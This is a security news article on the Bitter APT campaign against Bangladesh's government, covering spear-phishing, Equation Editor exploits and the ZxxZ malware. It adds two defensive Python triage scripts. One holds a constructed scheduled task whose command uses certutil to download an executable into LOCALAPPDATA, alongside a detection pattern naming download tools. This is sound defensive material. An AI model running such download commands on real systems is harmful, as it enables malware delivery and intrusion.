Bitter, an APT group engaged in cyber espionage, has been observed targeting the government of Bangladesh with new malware that features remote file execution capabilities. The campaign has been running since at least August 2021 and illustrates Bitter's targeting scope, which has remained consistent since 2013.
Cisco Talos threat analysts discovered the campaign and published the details. Based on overlaps in C2 IP addresses with previous campaigns, similarities in string encryption, and the module-naming methodology, Talos attributes this campaign to Bitter. Talos observed two infection chains, both starting with a spear-phishing email and each targeting a distinct group inside the Bangladeshi government.
The emails are sent from spoofed addresses that appear to belong to Pakistani government institutions. This was most likely accomplished by exploiting a weakness in a Zimbra mail server that allowed the attackers to send messages from an email account or domain that does not exist. The two infection chains differ in the type of file attached to the phishing email: one carries an .RTF document, the other an .XLSX document. The emails discuss call records and number verification in the context of real government undertakings.
The RTF documents exploit CVE-2017-11882 to execute code on devices running vulnerable versions of Microsoft Office. “When the victim opens the RTF file with Microsoft Word, it invokes the Equation Editor application and executes the equation formula containing the Return-Oriented Programming (ROP) gadgets,” said Cisco Talos. “The ROP loads and executes the shellcode located at the end of the maldocs in an encrypted format that connects to the malicious host olmajhnservice[.]com and downloads the payload,” the researchers explain.
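As an added triage example (not code from the Talos report or from this article): a small Python scanner that pulls the embedded OLE objects out of an RTF and flags Equation Editor (Equation.3) objects, which is the object type a CVE-2017-11882 maldoc has to embed to reach the vulnerable EQNEDT32 code, and notes when the object is marked `\objupdate`, which makes Word load it as soon as the document opens. The sample RTF is constructed for illustration and the object names, thresholds and helper functions are this example's own assumptions; real samples often obfuscate the `\objclass` and hex data, so treat this as a first-pass check rather than a detector.

```python
import re
from typing import Dict, List

# Constructed sample RTF (not one of the Talos maldocs): one embedded Equation Editor
# object marked \objupdate, followed by an ordinary Package object for contrast.
# The \objdata hex is an OLE1 ObjectHeader: version 0x0501, FormatID 2 (embedded),
# then the length-prefixed, NUL-terminated class name.
SAMPLE_RTF = rb"""{\rtf1\ansi\deff0
{\object\objemb\objupdate{\*\objclass Equation.3}{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000}}
{\object\objemb{\*\objclass Package}{\*\objdata 0105000002000000080000005061636b616765000000000000000000}}
}"""

# {0002CE02-0000-0000-C000-000000000046} (Equation Editor 3.0) as it appears on disk
# inside an OLE compound file: Data1..Data3 little-endian, remaining bytes as written.
EQUATION_CLSID = bytes.fromhex("02ce020000000000c000000000000046")


def _group_at(data: bytes, start: int) -> bytes:
    """Return the RTF group that opens at data[start] (a '{'), honouring nesting and escapes."""
    depth = 0
    i = start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":          # skip the escaped character (\{ or \}) or control word start
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return data[start:i + 1]
        i += 1
    return data[start:]         # truncated document: return what is there


def _objdata_blob(group: bytes) -> bytes:
    """Decode the hex payload of the group's \\objdata, ignoring whitespace and line breaks."""
    m = re.search(rb"\\objdata\s*([0-9a-fA-F\s]+)", group)
    if not m:
        return b""
    hexdata = re.sub(rb"[^0-9a-fA-F]", b"", m.group(1))
    if len(hexdata) % 2:        # tolerate a dangling nibble rather than crash on a damaged file
        hexdata = hexdata[:-1]
    return bytes.fromhex(hexdata.decode("ascii"))


def triage_rtf(rtf: bytes) -> List[Dict]:
    """Enumerate {\\object ...} groups and flag those that embed Equation Editor."""
    findings = []
    for n, m in enumerate(re.finditer(rb"\{\\object\b", rtf)):
        group = _group_at(rtf, m.start())
        cls_m = re.search(rb"\\objclass\s*([^\\{}]+)", group)
        objclass = cls_m.group(1).strip().decode("latin-1") if cls_m else "unknown"
        blob = _objdata_blob(group)
        reasons = []
        if "equation" in objclass.lower():
            reasons.append("objclass names Equation Editor")
        if b"Equation.3" in blob or EQUATION_CLSID in blob:
            reasons.append("objdata carries the Equation.3 class name or CLSID")
        if rb"\objupdate" in group:
            reasons.append("objupdate forces the object to load when the document opens")
        findings.append({
            "object": n,
            "objclass": objclass,
            "objdata_bytes": len(blob),
            "reasons": reasons,
            # Equation Editor objects are rare in legitimate documents since the component
            # was removed in January 2018; treat any of them as worth a closer look.
            "suspicious": any("Equation" in r for r in reasons),
        })
    return findings


if __name__ == "__main__":
    for f in triage_rtf(SAMPLE_RTF):
        print(f)
```

The scanner deliberately checks both the declared `\objclass` and the decoded `\objdata`, because maldoc builders routinely drop or mangle the class name while leaving the OLE header intact; a document with an `\objupdate`-marked Equation object that arrives by email warrants detonation or a look at the embedded Equation Native stream.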
Opening the Excel spreadsheet exploits CVE-2018-0798 and CVE-2018-0802, two further Equation Editor vulnerabilities that allow remote code execution on older Microsoft Office versions. In this chain, fetching the payload is handled by two scheduled tasks created by the exploit, which connect to the hosting server and download the trojan every five minutes after the initial infection.
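A short-interval scheduled task that pulls an executable from the network is the kind of artifact this chain leaves behind, so here is an added example (not from Talos or the original article) of triaging Task Scheduler XML, the format `schtasks /query /xml` and the files under `C:\Windows\System32\Tasks` use. Both task definitions are constructed; the article does not give the real tasks' command lines, and the five-minute threshold, the LOLBin list and the helper names are this example's assumptions.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task in the shape Task Scheduler exports; modelled on the behaviour
# described (repeat every five minutes, download a payload), not on the real samples.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT5M</Interval></Repetition>
      <StartBoundary>2021-08-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>cmd.exe</Command>
      <Arguments>/c certutil.exe -urlcache -f http://example.invalid/u %LOCALAPPDATA%\Update.exe</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for contrast: a vendor updater under Program Files, twice a day.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <Repetition><Interval>PT12H</Interval></Repetition>
      <StartBoundary>2021-08-01T03:00:00</StartBoundary>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Vendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""

# ISO 8601 duration subset used by Task Scheduler (PnDTnHnMnS).
DURATION_RE = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")
# URLs or binaries commonly used to fetch content (assumed list, extend per environment).
NETWORK_RE = re.compile(r"https?://|\b(certutil|bitsadmin|curl|wget|powershell|mshta)\b", re.I)
# User-writable locations a standard user can drop into without elevation.
USERLAND_RE = re.compile(r"%(LOCALAPPDATA|APPDATA|TEMP|TMP|USERPROFILE)%|\\AppData\\|\\Users\\", re.I)


def iso_duration_seconds(value: str) -> int:
    """Convert a Task Scheduler interval such as PT5M or P1DT2H30M to seconds."""
    m = DURATION_RE.match(value.strip())
    if not m:
        raise ValueError(f"unsupported duration: {value!r}")
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def triage_task(xml_text: str, max_interval_s: int = 300) -> Dict:
    """Score one task definition: tight repetition plus a download action from user space."""
    root = ET.fromstring(xml_text)
    intervals = [iso_duration_seconds(e.text) for e in root.findall(".//t:Repetition/t:Interval", TASK_NS)]
    commands = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", "", TASK_NS) + " " + ex.findtext("t:Arguments", "", TASK_NS)
        commands.append(cmd.strip())
    reasons = []
    if intervals and min(intervals) <= max_interval_s:
        reasons.append(f"repeats every {min(intervals)}s")
    if any(NETWORK_RE.search(c) for c in commands):
        reasons.append("action fetches from the network or invokes a download-capable binary")
    if any(USERLAND_RE.search(c) for c in commands):
        reasons.append("action writes to or runs from a user-writable directory")
    return {
        "min_interval_s": min(intervals) if intervals else None,
        "commands": commands,
        "reasons": reasons,
        "suspicious": len(reasons) >= 2,   # any single trait is common; the combination is not
    }


if __name__ == "__main__":
    print(triage_task(SUSPICIOUS_TASK))
    print(triage_task(BENIGN_TASK))
```

Run this over every file under `C:\Windows\System32\Tasks` (or over `schtasks /query /xml` output) on hosts that opened the phishing attachment; a task whose repetition interval matches the five-minute beacon and whose action lands in `%LOCALAPPDATA%` is a strong lead even when the payload on the hosting server has already been rotated.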
Cisco Talos named the malware ZxxZ. It is a 32-bit Windows executable that downloads and runs modules with generic names such as “Update.exe,” “ntfsc.exe,” and “nx.exe.” According to the report, these files “are either downloaded or dropped into the victim’s local application data folder and run as a Windows Security update with medium integrity to elevate the privileges of a standard user.” Anti-detection measures include obfuscated strings, and the malware checks for running Windows Defender and Kaspersky antivirus processes and attempts to terminate them.
An information-stealing routine then runs: it dumps victim profile data into a memory buffer and sends it to the command-and-control (C2) server. The C2 responds with a portable executable that is stored under “%LOCALAPPDATA%\Debug\.” If ZxxZ fails to fetch that executable, it tries 225 more times before giving up and exiting. Bitter remains active, adding new tools to its arsenal and investing more effort in evading detection. Defenders in South and Southeast Asia should use Cisco Talos’ indicators of compromise to detect and block Bitter APT activity.